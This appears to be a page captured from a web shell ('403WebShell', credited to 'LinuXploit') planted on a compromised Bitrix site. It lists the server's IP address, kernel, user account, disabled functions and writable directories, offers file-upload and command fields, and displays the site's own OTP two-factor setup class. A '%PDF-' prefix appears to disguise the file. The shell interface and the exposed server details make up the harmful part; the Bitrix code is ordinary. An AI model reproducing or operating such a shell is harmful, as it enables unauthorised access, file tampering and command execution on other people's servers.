%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.22.240.164
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/security.user.otp.init/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/security.user.otp.init/class.php
<?php
if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED !== true)
	die();

use Bitrix\Security\Mfa\Otp;
use Bitrix\Main\Localization\Loc;
use Bitrix\Main\Web\Json;

Loc::loadMessages(__FILE__);

class CSecurityUserOtpInit extends CBitrixComponent
{
	public function onPrepareComponentParams($arParams)
	{
		$result = array();
		if (
			$arParams['SUCCESSFUL_URL']
			&& preg_match('#^(?:/|https?://)#', $arParams['SUCCESSFUL_URL'])
		)
		{
			$result['SUCCESSFUL_URL'] = $arParams['SUCCESSFUL_URL'];
		}
		else
		{
			$result['SUCCESSFUL_URL'] = '/';
		}

		if (isset($arParams["REDIRECT_AFTER_CONNECTION"]))
		{
			$result["REDIRECT_AFTER_CONNECTION"] = $arParams["REDIRECT_AFTER_CONNECTION"] === "Y" ? "Y" : "N";
		}
		else
		{
			$result["REDIRECT_AFTER_CONNECTION"] = "Y";
		}

		if (
			$arParams['SHOW_DESCRIPTION']
			&& preg_match('#^(Y|N)$#', $arParams['SHOW_DESCRIPTION'])
		)
		{
			$result['SHOW_DESCRIPTION'] = $arParams['SHOW_DESCRIPTION'];
		}
		else
		{
			$result['SHOW_DESCRIPTION'] = 'Y';
		}

		return $result;
	}

	public function executeComponent()
	{
		/** @global CMain $APPLICATION */
		global $APPLICATION;

		if (
			$this->request->isPost()
			&& $this->request['otpAction']
		)
		{
			// try to connect
			$result = $this->toEdit();
			$result = Json::encode($result);
			$APPLICATION->RestartBuffer();
			header('Content-Type: application/json', true);
			echo $result;
			die();
		}
		else
		{
			$APPLICATION->SetTitle(Loc::getMessage("SECURITY_OTP_TITLE"));
			// get data for new OTP connection
			$this->arResult = $this->toView();
			$this->IncludeComponentTemplate();
		}
	}

	/**
	 * @return array
	 */
	protected function toView()
	{
		/** @global CUser $USER */
		global $USER;

		if (!$USER->IsAuthorized())
		{
			return array(
				'MESSAGE' => Loc::getMessage("SECURITY_OTP_AUTH_ERROR")
			);
		}

		if (!CModule::includeModule('security'))
		{
			return array(
				'MESSAGE' => Loc::getMessage("SECURITY_OTP_MODULE_ERROR")
			);
		}

		$result = array();
		$otp = Otp::getByUser($USER->getid());
		$otp->regenerate();
		$result['SECRET'] = $otp->getHexSecret();
		$result['TYPE'] = $otp->getType();
		$result['APP_SECRET'] = $otp->getAppSecret();
		$result['APP_SECRET_SPACED'] = chunk_split($result['APP_SECRET'], 4, ' ');
		$result['PROVISION_URI'] = $otp->getProvisioningUri();
		$result['SUCCESSFUL_URL'] = $this->arParams['SUCCESSFUL_URL'];
		$result['REDIRECT_AFTER_CONNECTION'] = $this->arParams['REDIRECT_AFTER_CONNECTION'];
		$result['TWO_CODE_REQUIRED'] = $otp->getAlgorithm()->isTwoCodeRequired();
		$result['OTP'] = $otp;

		return $result;
	}

	/**
	 * @return array
	 */
	protected function toEdit()
	{
		/** @global CUser $USER */
		global $USER;

		if (!$USER->IsAuthorized())
		{
			return array(
				'status' => 'error',
				'error' => 'auth_error'
			);
		}

		if (!check_bitrix_sessid())
		{
			return array(
				'status' => 'error',
				'error' => 'sessid_check_failed'
			);
		}

		if ($this->request['action'] !== 'otp_check_activate')
		{
			return array(
				'status' => 'error',
				'error' => 'unknown_action'
			);
		}

		if (!CModule::includeModule('security'))
		{
			return array(
				'status' => 'error',
				'error' => 'security_not_installed'
			);
		}

		try
		{
			$otp = Otp::getByUser($USER->getid());
			if(preg_match("/[^[:xdigit:]]/i", $this->request->getPost('secret')))
			{
				$binarySecret = $this->request->getPost('secret');
			}
			else
			{
				$binarySecret = pack('H*', $this->request->getPost('secret'));
			}
			$otp
				->regenerate($binarySecret)
				->syncParameters($this->request->getPost('sync1'), $this->request->getPost('sync2'))
				->save()
			;

			return array(
				'status' => 'ok'
			);
		}
		catch (\Bitrix\Security\Mfa\OtpException $e)
		{
			return array(
				'status' => 'error',
				'error' => $e->getMessage()
			);
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit